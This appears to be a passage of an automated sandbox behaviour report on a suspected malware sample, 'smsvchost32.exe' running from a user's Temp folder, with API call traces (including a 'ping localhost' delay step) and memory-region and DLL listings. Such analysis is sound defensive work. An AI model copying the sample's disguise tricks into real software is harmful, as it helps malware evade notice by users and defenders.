	[0118.919] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x10df4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87
	[0118.919] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0119.708] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x10df4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a
	[0119.854] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0119.854] FindFirstFileExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x18ed80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ed80) returned 0xffffffff
	[0119.854] GetLastError () returned 0x2
	[0119.854] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0119.855] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x18ed80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ed80) returned 0xffffffff
	[0119.855] GetLastError () returned 0x2
	[0119.855] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0119.857] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x18ed80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ed80) returned 0x5279af8
	[0119.991] FindClose (in: hFindFile=0x5279af8 | out: hFindFile=0x5279af8) returned 1
	[0119.991] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0x18ed80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ed80) returned 0xffffffff
	[0119.991] GetLastError () returned 0x2
	[0119.991] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0x18ed80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ed80) returned 0x5279af8
	[0119.991] FindClose (in: hFindFile=0x5279af8 | out: hFindFile=0x5279af8) returned 1
	[0119.992] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
	[0119.992] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
	[0119.992] GetConsoleTitleW (in: lpConsoleTitle=0x18f274, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0120.091] InitializeProcThreadAttributeList (in: lpAttributeList=0x18f1a0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18f184 | out: lpAttributeList=0x18f1a0, lpSize=0x18f184) returned 1
	[0120.091] UpdateProcThreadAttribute (in: lpAttributeList=0x18f1a0, dwFlags=0x0, Attribute=0x60001, lpValue=0x18f18c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18f1a0, lpPreviousValue=0x0) returned 1
	[0120.091] GetStartupInfoW (in: lpStartupInfo=0x18f1d8 | out: lpStartupInfo=0x18f1d8*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) 
	[0120.091] _wcsnicmp (_String1="COPYCMD", _String2="=::=::\\", _MaxCount=0x7) returned 38
	[0120.091] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
	[0120.091] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
	[0120.091] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
	[0120.091] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0120.091] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0120.091] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0120.091] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
	[0120.091] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
	[0120.091] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3
	[0120.091] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3
	[0120.091] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
	[0120.091] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
	[0120.091] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
	[0120.091] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
	[0120.091] _wcsnicmp (_String1="COPYCMD", _String2="mainpro", _MaxCount=0x7) returned -10
	[0120.091] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
	[0120.091] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12
	[0120.091] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
	[0120.091] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
	[0120.091] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
	[0120.091] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0120.091] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0120.091] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0120.091] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0120.091] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0120.091] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0120.092] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0120.092] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0120.092] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0120.092] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
	[0120.092] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
	[0120.092] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
	[0120.092] _wcsnicmp (_String1="COPYCMD", _String2="RandomL", _MaxCount=0x7) returned -15
	[0120.092] _wcsnicmp (_String1="COPYCMD", _String2="SESSION", _MaxCount=0x7) returned -16
	[0120.092] _wcsnicmp (_String1="COPYCMD", _String2="standal", _MaxCount=0x7) returned -16
	[0120.092] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
	[0120.092] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
	[0120.092] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
	[0120.092] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
	[0120.092] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0120.092] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0120.092] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
	[0120.092] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
	[0120.092] _wcsnicmp (_String1="COPYCMD", _String2="vendor_", _MaxCount=0x7) returned -19
	[0120.092] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
	[0120.092] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1
	[0120.119] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping  localhost -n 4 ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\Nd9E1FYi\\Desktop", lpStartupInfo=0x18f128*(cb=0x48, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="ping  localhost -n 4 ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f174 | out: lpCommandLine="ping  localhost -n 4 ", lpProcessInformation=0x18f174*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xdb0, dwThreadId=0xd5c)) returned 1
	[0120.259] CloseHandle (hObject=0xa4) returned 1
	[0120.259] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0120.259] GetEnvironmentStringsW () returned 0x527aab0*
	[0120.260] FreeEnvironmentStringsA (penv="=") returned 1
	[0120.260] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) 

Thread:
	id = 140
	os_tid = 0xd6c


Process:
	id = "12"
	image_name = "smsvchost32.exe"
	filename = "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\smsvchost32.exe"
	page_root = "0x59bb1000"
	os_pid = "0xdd4"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "10"
	os_parent_pid = "0x934"
	cmd_line = "C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe --vwxyz"
	cur_dir = "C:\\Users\\Nd9E1FYi\\Desktop\\"
	os_username = "X2VS1CUM\\Nd9E1FYi"
	os_groups = "X2VS1CUM\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f009" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 1823
	        start_va = 0x10000
	          end_va = 0x2ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000010000"
	        filename = ""

Region:
	              id = 1824
	        start_va = 0x30000
	          end_va = 0x31fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000030000"
	        filename = ""

Region:
	              id = 1825
	        start_va = 0x40000
	          end_va = 0x54fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000040000"
	        filename = ""

Region:
	              id = 1826
	        start_va = 0x60000
	          end_va = 0x9ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000060000"
	        filename = ""

Region:
	              id = 1827
	        start_va = 0xa0000
	          end_va = 0x19ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000000a0000"
	        filename = ""

Region:
	              id = 1828
	        start_va = 0x1a0000
	          end_va = 0x1a3fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000001a0000"
	        filename = ""

Region:
	              id = 1829
	        start_va = 0x1b0000
	          end_va = 0x1b1fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001b0000"
	        filename = ""

Region:
	              id = 1830
	        start_va = 0x200000
	          end_va = 0x3fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000200000"
	        filename = ""

Region:
	              id = 1831
	        start_va = 0x400000
	          end_va = 0x43efff
	     entry_point = 0x400000
	     region_type = mapped_file
	            name = "smsvchost32.exe"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\smsvchost32.exe")

Region:
	              id = 1832
	        start_va = 0x77960000
	          end_va = 0x77adafff
	     entry_point = 0x77960000
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 1833
	        start_va = 0x7ffb0000
	          end_va = 0x7ffd2fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007ffb0000"
	        filename = ""

Region:
	              id = 1834
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 1835
	        start_va = 0x7fff0000
	          end_va = 0x7ffc1562ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 1836
	        start_va = 0x7ffc15630000
	          end_va = 0x7ffc157f0fff
	     entry_point = 0x7ffc15630000
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 1837
	        start_va = 0x7ffc157f1000
	          end_va = 0x7ffffffeffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffc157f1000"
	        filename = ""

Region:
	              id = 1838
	        start_va = 0x480000
	          end_va = 0x48ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000480000"
	        filename = ""

Region:
	              id = 1839
	        start_va = 0x55c00000
	          end_va = 0x55c79fff
	     entry_point = 0x55c00000
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 1840
	        start_va = 0x55c90000
	          end_va = 0x55cdffff
	     entry_point = 0x55c90000
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 1841
	        start_va = 0x55c80000
	          end_va = 0x55c87fff
	     entry_point = 0x55c80000
	     region_type = mapped_file
	            name = "wow64cpu.dll"
	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 1842
	        start_va = 0x10000
	          end_va = 0x1ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 1843
	        start_va = 0x20000
	          end_va = 0x23fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000020000"
	        filename = ""

Region:
	              id = 1844
	        start_va = 0x1c0000
	          end_va = 0x1fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 1845
	        start_va = 0x4f0000
	          end_va = 0x5effff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000004f0000"
	        filename = ""

Region:
	              id = 1846
	        start_va = 0x5f0000
	          end_va = 0x6adfff
	     entry_point = 0x5f0000
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 1847
	        start_va = 0x6b0000
	          end_va = 0x7affff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000006b0000"
	        filename = ""

Region:
	              id = 1848
	        start_va = 0x6fce0000
	          end_va = 0x6fcfbfff
	     entry_point = 0x6fce0000
	     region_type = mapped_file
	            name = "ntdsapi.dll"
	        filename = "\\Windows\\SysWOW64\\ntdsapi.dll" (normalized: "c:\\windows\\syswow64\\ntdsapi.dll")

Region:
	              id = 1849
	        start_va = 0x6fd00000
	          end_va = 0x6fd17fff
	     entry_point = 0x6fd00000
	     region_type = mapped_file
	            name = "atl.dll"
	        filename = "\\Windows\\SysWOW64\\atl.dll" (normalized: "c:\\windows\\syswow64\\atl.dll")

Region:
	              id = 1850
	        start_va = 0x6fd20000
	          end_va = 0x6fd45fff
	     entry_point = 0x6fd20000
	     region_type = mapped_file
	            name = "odbctrac.dll"
	        filename = "\\Windows\\SysWOW64\\odbctrac.dll" (normalized: "c:\\windows\\syswow64\\odbctrac.dll")

Region:
	              id = 1851
	        start_va = 0x6fd50000
	          end_va = 0x6fd76fff
	     entry_point = 0x6fd50000
	     region_type = mapped_file
	            name = "dsprop.dll"
	        filename = "\\Windows\\SysWOW64\\dsprop.dll" (normalized: "c:\\windows\\syswow64\\dsprop.dll")

Region:
	              id = 1852
	        start_va = 0x6ffa0000
	          end_va = 0x6ffe9fff
	     entry_point = 0x6ffa0000
	     region_type = mapped_file
	            name = "eappcfg.dll"
	        filename = "\\Windows\\SysWOW64\\eappcfg.dll" (normalized: "c:\\windows\\syswow64\\eappcfg.dll")

Region:
	              id = 1853
	        start_va = 0x74680000
	          end_va = 0x74689fff
	     entry_point = 0x74680000
	     region_type = mapped_file
	            name = "cryptbase.dll"
	        filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")

Region:
	              id = 1854
	        start_va = 0x74690000
	          end_va = 0x746adfff
	     entry_point = 0x74690000
	     region_type = mapped_file
	            name = "sspicli.dll"
	        filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")

Region:
	              id = 1855
	        start_va = 0x746c0000
	          end_va = 0x7471efff
	     entry_point = 0x746c0000
	     region_type = mapped_file
	            name = "ws2_32.dll"
	        filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll")

Region:
	              id = 1856
	        start_va = 0x74720000
	          end_va = 0x74763fff
	     entry_point = 0x74720000
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")

Region:
	              id = 1857
	        start_va = 0x747c0000
	          end_va = 0x7487dfff
	     entry_point = 0x747c0000
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")

Region:
	              id = 1858
	        start_va = 0x74aa0000
	          end_va = 0x74b1afff
	     entry_point = 0x74aa0000
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")

Region:
	              id = 1859
	        start_va = 0x75070000
	          end_va = 0x7511cfff
	     entry_point = 0x75070000
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")

Region:
	              id = 1860
	        start_va = 0x75120000
	          end_va = 0x7651efff
	     entry_point = 0x75120000
	     region_type = mapped_file
	            name = "shell32.dll"
	        filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll")

Region:
	              id = 1861
	        start_va = 0x765a0000
	          end_va = 0x7667ffff
	     entry_point = 0x765a0000
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 1862
	        start_va = 0x76ec0000
	          end_va = 0x76ef6fff
	     entry_point = 0x76ec0000
	     region_type = mapped_file
	            name = "cfgmgr32.dll"
	        filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll")

Region:
	              id = 1863
	        start_va = 0x76f00000
	          end_va = 0x7704efff
	     entry_point = 0x76f00000
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")

Region:
	              id = 1864
	        start_va = 0x773a0000
	          end_va = 0x773f7fff
	     entry_point = 0x773a0000
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")

Region:
	              id = 1865
	        start_va = 0x774c0000
	          end_va = 0x7763dfff
	     entry_point = 0x774c0000
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 1866
	        start_va = 0x77810000
	          end_va = 0x77956fff
	     entry_point = 0x77810000
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")

Region:
	              id = 1867
	        start_va = 0x7feb0000
	          end_va = 0x7ffaffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007feb0000"
	        filename = ""

Region:
	              id = 1868
	        start_va = 0x6fb40000
	          end_va = 0x6fbd8fff
	     entry_point = 0x6fb40000
	     region_type = mapped_file
	            name = "odbc32.dll"
	        filename = "\\Windows\\SysWOW64\\odbc32.dll" (normalized: "c:\\windows\\syswow64\\odbc32.dll")

Region:
	              id = 1869
	        start_va = 0x70090000
	          end_va = 0x70097fff
	     entry_point = 0x70090000
	     region_type = mapped_file
	            name = "dpapi.dll"
	        filename = "\\Windows\\SysWOW64\\dpapi.dll" (normalized: "c:\\windows\\syswow64\\dpapi.dll")

Region:
	              id = 1870
	        start_va = 0x74770000
	          end_va = 0x747b3fff
	     entry_point = 0x74770000
	     region_type = mapped_file
	            name = "powrprof.dll"
	        filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll")

Region:
	              id = 1871
	        start_va = 0x74880000
	          end_va = 0x74a3cfff
	     entry_point = 0x74880000
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")

Region:
	              id = 1872
	        start_va = 0x74b20000
	          end_va = 0x74b64fff
	     entry_point = 0x74b20000
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")

Region:
	              id = 1873
	        start_va = 0x74b70000
	          end_va = 0x75068fff
	     entry_point = 0x74b70000
	     region_type = mapped_file
	            name = "windows.storage.dll"
	        filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll")

Region:
	              id = 1874
	        start_va = 0x766e0000
	          end_va = 0x766eefff
	     entry_point = 0x766e0000
	     region_type = mapped_file
	            name = "profapi.dll"
	        filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll")

Region:
	              id = 1875
	        start_va = 0x76b60000
	          end_va = 0x76bf1fff
	     entry_point = 0x76b60000
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")

Region:
	              id = 1876
	        start_va = 0x771d0000
	          end_va = 0x772bafff
	     entry_point = 0x771d0000
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")

Region:
	              id = 1877
	        start_va = 0x77400000
	          end_va = 0x7748cfff
	     entry_point = 0x77400000
	     region_type = mapped_file
	            name = "shcore.dll"
	        filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll")

Region:
	              id = 1878
	        start_va = 0x77760000
	          end_va = 0x7776bfff
	     entry_point = 0x77760000
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")

Region:
	              id = 1879
	        start_va = 0x30000
	          end_va = 0x30fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000030000"
	        filename = ""

Region:
	              id = 1880
	        start_va = 0x440000
	          end_va = 0x440fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000440000"
	        filename = ""

Region:
	              id = 1881
	        start_va = 0x450000
	          end_va = 0x451fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000450000"
	        filename = ""

Region:
	              id = 1882
	        start_va = 0x460000
	          end_va = 0x461fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000460000"
	        filename = ""

Region:
	              id = 1883
	        start_va = 0x470000
	          end_va = 0x471fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000470000"
	        filename = ""

Region:
	              id = 1884
	        start_va = 0x490000
	          end_va = 0x493fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000490000"
	        filename = ""

Region:
	              id = 1885
	        start_va = 0x880000
	          end_va = 0x88ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000880000"
	        filename = ""

Region:
	              id = 1886
	        start_va = 0x890000
	          end_va = 0xa17fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000890000"
	        filename = ""

Region:
	              id = 1887
	        start_va = 0xa20000
	          end_va = 0xba0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000a20000"
	        filename = ""

Region:
	              id = 1888
	        start_va = 0xbb0000
	          end_va = 0x1faffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000bb0000"
	        filename = ""

Region:
	              id = 1889
	        start_va = 0x2140000
	          end_va = 0x214ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002140000"
	        filename = ""

Region:
	              id = 1890
	        start_va = 0x6f830000
	          end_va = 0x6fa3efff
	     entry_point = 0x6f830000
	     region_type = mapped_file
	            name = "comctl32.dll"
	        filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll")

Region:
	              id = 1891
	        start_va = 0x6fa40000
	          end_va = 0x6fa55fff
	     entry_point = 0x6fa40000
	     region_type = mapped_file
	            name = "mpr.dll"
	        filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll")

Region:
	              id = 1892
	        start_va = 0x6fa60000
	          end_va = 0x6faf1fff
	     entry_point = 0x6fa60000
	     region_type = mapped_file
	            name = "comctl32.dll"
	        filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll")

Region:
	              id = 1893
	        start_va = 0x6fb00000
	          end_va = 0x6fb37fff
	     entry_point = 0x6fb00000
	     region_type = mapped_file
	            name = "adsldpc.dll"
	        filename = "\\Windows\\SysWOW64\\adsldpc.dll" (normalized: "c:\\windows\\syswow64\\adsldpc.dll")

Region:
	              id = 1894
	        start_va = 0x6fbe0000
	          end_va = 0x6fbe7fff
	     entry_point = 0x6fbe0000
	     region_type = mapped_file
	            name = "dsrole.dll"
	        filename = "\\Windows\\SysWOW64\\dsrole.dll" (normalized: "c:\\windows\\syswow64\\dsrole.dll")

Region:
	              id = 1895
	        start_va = 0x6fbf0000
	          end_va = 0x6fc98fff
	     entry_point = 0x6fbf0000
	     region_type = mapped_file
	            name = "dsuiext.dll"
	        filename = "\\Windows\\SysWOW64\\dsuiext.dll" (normalized: "c:\\windows\\syswow64\\dsuiext.dll")

Region:
	              id = 1896
	        start_va = 0x6fca0000
	          end_va = 0x6fcdafff
	     entry_point = 0x6fca0000
	     region_type = mapped_file
	            name = "activeds.dll"
	        filename = "\\Windows\\SysWOW64\\activeds.dll" (normalized: "c:\\windows\\syswow64\\activeds.dll")

Region:
	              id = 1897
	        start_va = 0x6ff90000
	          end_va = 0x6ff99fff
	     entry_point = 0x6ff90000
	     region_type = mapped_file
	            name = "netutils.dll"
	        filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll")

Region:
	              id = 1898
	        start_va = 0x71d30000
